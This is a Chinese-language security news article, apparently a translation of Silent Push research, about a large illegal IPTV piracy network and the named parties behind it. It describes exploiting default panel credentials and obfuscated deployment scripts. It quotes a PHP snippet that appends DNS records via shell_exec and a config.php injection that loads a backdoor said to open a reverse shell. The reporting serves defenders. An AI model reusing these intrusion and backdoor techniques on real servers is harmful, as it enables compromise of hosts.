发现了一个庞大的非法互联网协议电视 (IPTV) 服务网络,该网络在 1,100 多个域和超过 10,000 个 IP 地址上运行。
这个庞大的基础设施已经活跃了几年,在没有许可协议的情况下提供未经授权的优质内容流,包括主要体育联盟、订阅服务和点播平台。
Silent Push 分析师指出,该网络同时使用大量 IP 地址池和快速轮换的域代表着盗版策略的显着升级,使得传统的删除过程几乎徒劳无功。
该网络的核心依赖于围绕修改后的开源软件(如 Stalker Portal 和 Xtream UI)构建的定制 IPTV 面板。
这些面板有助于自动用户身份验证和流分发,使运营商能够配置数十万个同时会话。
运营商不依赖于单个前端域,而是使用大量代理域(每个代理域解析为多个共享 IP 地址)来混淆流的真实来源。
Silent Push 研究人员确定了两家公司 XuiOne 和 Tiyansoft,以及来自阿富汗赫拉特的 Nabi Neamati 个人是该基础设施的主要受益者。
攻击媒介从服务器端利用和凭据收集开始。恶意行为者会破坏保护不足的网络主机或利用过时的控制面板来安装自定义模块,将后门注入合法的流媒体控制软件。
在许多情况下,操作员通过利用 cPanel、Plesk 和 Stalker Portal 安装上的默认凭据来获得初始访问权限。
一旦访问得到保护,部署脚本(通常通过 Base64 编码进行混淆)会推送修改后的 PHP 文件和 cron 作业,以自动注册新域和流端点的轮换。
静默推送分析师发现了一个这样的脚本,它使用以下代码片段来注册新的虚拟主机:
$domain = trim(shell_exec('wp option get siteurl'));
$ipList = ['158.220.114.199','46.202.197.208'];
foreach ($ipList as $ip) {
shell_exec("echo '$domain IN A $ip' >> /etc/bind/db.piracy");
}
shell_exec('rndc reload');尽管多次提出删除请求,但该网络在轮换域和 IP 地址方面的敏捷性使其能够保持运行。
几乎每天都会出现新域,每个域都解析为通过防弹托管服务提供商配置的动态 IP 地址集群。
这种弹性结构对试图破坏该服务的权利持有者和执法机构构成了巨大的挑战。
通过控制面板漏洞利用的感染机制
这个 IPTV 盗版网络的一个特别阴险的方面是它的感染机制,它以受损的控制面板为中心。
操作员使用自动扫描仪检测端口 80、8080 和 2095 上易受攻击的端点,调查互联网上是否存在配置错误或过时的 Stalker Portal 和 Xtream UI 安装。
在识别目标后,他们部署一个多级有效载荷,从一个低调的侦察模块开始。
此模块枚举现有用户帐户,收集散列凭据,并泄露包含 API 密钥的配置文件。
第二阶段通过修改面板目录中的文件来安装持久性后门:-config.php
if (!defined('IPTV_INIT')) {
define('IPTV_INIT', true);
require_once __DIR__ . '/backdoor.php';
}每当管理员登录时,后门脚本都会为命令和控制服务器建立反向 shell,从而有效地授予攻击者对面板的完全控制权。backdoor.php
这种持久的立足点可以持续更新托管基础设施、无缝域名注册和动态 IP 分配,确保新的入口点取代任何已被删除的入口点。
因此,该网络可以以最小的中断维持大规模盗版作。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
